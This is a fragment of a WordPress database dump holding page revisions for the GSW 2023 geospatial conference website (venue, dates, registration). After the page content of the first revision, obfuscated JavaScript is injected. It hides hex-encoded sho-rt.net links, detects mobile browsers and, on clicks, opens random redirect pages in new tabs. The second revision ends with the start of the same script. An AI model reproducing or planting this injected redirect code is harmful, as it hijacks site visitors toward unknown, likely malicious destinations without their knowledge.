-webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h2 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h2>\r\n<h2 style=\"text-align: justify; color: cyan;\"><strong><a>INTERCONTINENTAL CAIRO SEMIRAMIS</a></strong></h2>\r\n&nbsp;\r\n<h2 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h2>\r\n<h3 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h3>\r\n<h3 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h3>\r\n<h3 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h3>\r\n<h3 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h3>\r\n<h3 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h3>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 20:37:25','2022-11-09 20:37:25','',3066,'https://gsw2023.com/?p=3217',0,'revision','',0),
(3218,1,'2022-11-09 20:40:04','2022-11-09 20:40:04','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong><a>INTERCONTINENTAL CAIRO SEMIRAMIS</a></strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let 